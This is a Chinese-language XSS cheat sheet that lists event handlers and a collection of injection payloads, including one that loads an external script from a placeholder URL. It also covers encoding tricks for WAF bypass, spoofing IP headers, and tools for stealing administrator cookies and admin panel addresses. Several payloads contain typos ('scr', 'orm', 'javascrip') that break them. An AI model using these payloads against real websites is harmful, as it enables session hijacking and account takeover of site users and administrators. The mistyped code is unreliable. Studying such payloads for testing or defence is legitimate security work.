xss 就是在页面执行你想要的 js
IP ,Referer ,User-Agent, Cookie 等都可以修改。
服务器端经常使用document.boby.innerHtml 等函数动态生成 html 页面
一、常用函数、构造语句
1.常用函数
onclick 鼠标点击触发
onmousemove 当鼠标移动就触发
onload 当页面加载完成后触发傻
2.常用构造语句
<script scr="js_url"></script>
<a href=javascrip:alert('xss')>s</a>
//点 击 s时 运 行 alert('xss')
<iframesrc="javascript:alert(2)">
//若存在 X-frame 选项, Payload 失效。
<img scr=1 onerror=alert('xss')>
//当 找 不 到图 片 名 为 1 的 文 件 时, 执 行 alert('xss')
<video src=test.mp4 onerror=alert(‘1’);>//视频
<audio src=test.mp3 onerror=alert(‘1’);>//音乐
<orm action="Javascript:alert(1)"><input type=submit><isindex action="javascript:alert(1)" type=image>
<svg/onload=prompt(1);>
//SVG 是使用 XML 来描述二维图形和绘图程序的语言。
<body onload=prompt(1);>
<select autofocus onfocus=alert(1)>
// autofocus 属性规定当页面加载时 input 元素应该自动获得焦点。
<textarea autofocus onfocus=alert(1)>
<video><source>
//这里也可以通过各种变形绕过 WAF
<img src=x onerror=appendChild(createElement('script')).src='js_url' />
<iframe src=javascript:alert('xss');height=0 width=0 /><iframe>
//利 用 iframe 的 scr 来 弹 窗
<img src="1" onerror=eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")></img>
//过滤了alert 来执行弹窗等等有很多的方法,
<svg onload=confirm``>
3.绕过方式
(1).编码绕过
Javascript 可以使用多种编码方式,如 16 进制、Unicode、HTML 等进行编码。
支持编码属性:
href=
action=
name=
background=
src=
data=
二、常用工具
1. win工具
Sky、Safe3WVS、Netsparker 等都可以挖掘出反射 XSS
2.firefox 浏览器和两个附件
- X-Forwarded-For Header
因为PHP获取IP有3个函数。而X-Forwarded-For Header就是对其中一个函数X_FORWARDED_FOR起作用,X_FORWARDED_FOR 有个缺陷可以使客户端伪造任意 IP,当然包括字符串,但是对其他两个函数就不行了。 - Modify HeadersModify Headers
可以伪造数据包内容,当然也可以伪造 HTTP_CLIENT_IP 来更改 IP。
3. 后续攻击工具
管理员的 cookies 和后台地址还有管理员浏览器版本等等你都可以获取到
桂林老兵 cookie 欺骗工具
优先级标签
<textarea> 标签
网友评论